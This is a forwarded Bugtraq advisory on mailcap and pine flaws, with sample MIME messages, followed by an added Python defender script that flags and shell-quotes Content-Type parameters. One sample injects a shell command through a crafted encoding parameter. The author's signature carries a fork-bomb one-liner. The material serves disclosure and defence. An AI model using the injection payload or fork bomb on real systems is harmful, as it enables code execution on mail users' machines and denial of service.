
RE: mailrc and pine security holes



hi 

only 4 info :)

-----Forwarded message from Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>-----
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From:	Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
Subject:      mailrc and pine security holes
To:	BUGTRAQ@NETSPACE.ORG

Many mailcap-compatible Unix mail clients have several security holes.
The mailcap mechanism is usually so poorly implemented that it's possible
to perform a wide range of attacks - from 'harmless' messing on screen,
through executing specific commands with arbitrary parameters,
even to executing *arbitrary* commands via an e-mail message.

Here are examples, both tested under the Linux RH 5.0 distribution (mailcap
1.0.6, pine 3.96):


=======================================
Example 1 (light) - pine 3.96 confusion
=======================================

The following example demonstrates how to cause a few 'mostly harmless'
errors due to the improper expansion of the ` character by pine - it's
just annoying, because you can't view this mail properly, but I
have no idea if it's exploitable:

**** SAMPLE MIME MESSAGE ****
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

------=_NextPart_000_0007_01BD5F09.B6797740
Content-Type: text/plain;
        charset="crashme`"
Content-Transfer-Encoding: quoted-printable

Hellow!

------=_NextPart_000_0007_01BD5F09.B6797740--
**** END OF EXAMPLE ****


===============================================
Example 2 (heavy) - execution of arbitrary code
===============================================

That's something even more dangerous - the following MIME mail, when viewed,
executes 'touch /tmp/BIG_HOLE' (the bug lies in the metamail script):

**** SAMPLE MIME MESSAGE ****
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

------=_NextPart_000_0007_01BD5F09.B6797740
Content-Type: default;
        encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ touch\ \/tmp/BIG_HOLE"
Content-Transfer-Encoding: quoted-printable

Hellow!!!

------=_NextPart_000_0007_01BD5F09.B6797740--
**** END OF EXAMPLE ****

_______________________________________________________________________
Michal Zalewski [lcamtuf@boss.staszic.waw.pl] <= finger for pub PGP key
To iterate is human, to recurse divine [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]

-----End of forwarded message-----

-- 
Regards,
	Andreas
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|Andreas Mueller                                      Akdeniz-Koleji      |
|System-Administrator                              amu@akdenizk.com.tr    |
|Konyaalti Cad. Gündüz Apt. 19/15 07050 Antalya Work-Phone:0090-242-2481880|
|private: amu@linux.de                         Private: 0090-242-2482402   |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PGP Key Fingerprint = 58 BD 95 55 34 18 29 E8  AD 88 58 64 1F A4 7A 38


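The class of bug in the forwarded post is a mail client taking a Content-Type parameter (charset, encoding, ...) straight out of an untrusted message and splicing it, unquoted, into the shell command line built from a mailcap entry. The following is an added defender-side example, not code from the post and not pine's or metamail's own code. It uses the standard library `email` parser to pull the parameters out of a part's header, flags values that fail a conservative allow-list (the allow-list, the constructed sample headers and the `iconv` mailcap template are all assumptions of this example), and contrasts the unquoted substitution that makes the attack work with a substitution that shell-quotes every value so it can only ever be a single argument. Nothing is executed; the functions only return the command strings so you can see the difference.

```python
"""Defensive checks for mailcap parameter injection.

Constructed example: the sample headers and the mailcap template below are made
up for this demo; the allow-list is an illustrative policy, not a standard.
"""
import re
import shlex
from email import message_from_string

# Conservative allow-list for any parameter value that might reach a shell.
# IANA charset names and similar tokens fit; shell metacharacters do not.
SAFE_PARAM = re.compile(r"[A-Za-z0-9._:+-]{1,40}")

# RFC 1524 substitution markers: %s (temp file name) and %{name} (Content-Type parameter).
SUBST = re.compile(r"%s|%\{([^}]*)\}")


def content_type_params(raw_message):
    """Return the Content-Type parameters of a message as {name: value}."""
    params = message_from_string(raw_message).get_params() or []
    # get_params() puts the media type itself first; the rest are name/value pairs.
    return {name: value for name, value in params[1:]}


def unsafe_params(raw_message):
    """Return the parameters whose value fails the allow-list (what a scanner would flag)."""
    return {
        name: value
        for name, value in content_type_params(raw_message).items()
        # RFC 2231-encoded values come back as tuples; treat anything non-string as unsafe too.
        if not isinstance(value, str) or not SAFE_PARAM.fullmatch(value)
    }


def naive_expand(template, params, filename):
    """Unquoted substitution: the pattern the post's examples abuse (shown only for contrast)."""
    return SUBST.sub(
        lambda m: filename if m.group(0) == "%s" else params.get(m.group(1), ""),
        template,
    )


def safe_expand(template, params, filename):
    """Substitute with shell quoting, so a value is one argument and never shell syntax."""
    def repl(m):
        value = filename if m.group(0) == "%s" else params.get(m.group(1), "")
        return shlex.quote(value)
    return SUBST.sub(repl, template)


# Constructed sample messages modelled on the post's examples (not copied from them).
SAMPLES = {
    "benign": 'Content-Type: text/plain; charset="iso-8859-2"\n\nhello\n',
    "backtick": 'Content-Type: text/plain; charset="crashme`"\n\nhello\n',
    "quote_break": 'Content-Type: text/plain; charset="x\\" ) oops"\n\nhello\n',
}

# Hypothetical mailcap command for text/plain; %{charset} is the injection point.
TEMPLATE = "iconv -f %{charset} -t utf-8 %s"

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        params = content_type_params(raw)
        print(f"{label}: flagged = {unsafe_params(raw) or 'none'}")
        print("  naive:", naive_expand(TEMPLATE, params, "/tmp/part.txt"))
        print("  safe :", safe_expand(TEMPLATE, params, "/tmp/part.txt"))
```

The allow-list check is the cheap first line of defence (reject or neutralise the part before any viewer runs), but the real fix is in `safe_expand`: build the command with every substituted value quoted, or better, avoid the shell entirely and pass the viewer an argument vector. `shlex.quote` wraps anything containing a metacharacter in single quotes, so the backtick and the closing double quote in the samples become inert text.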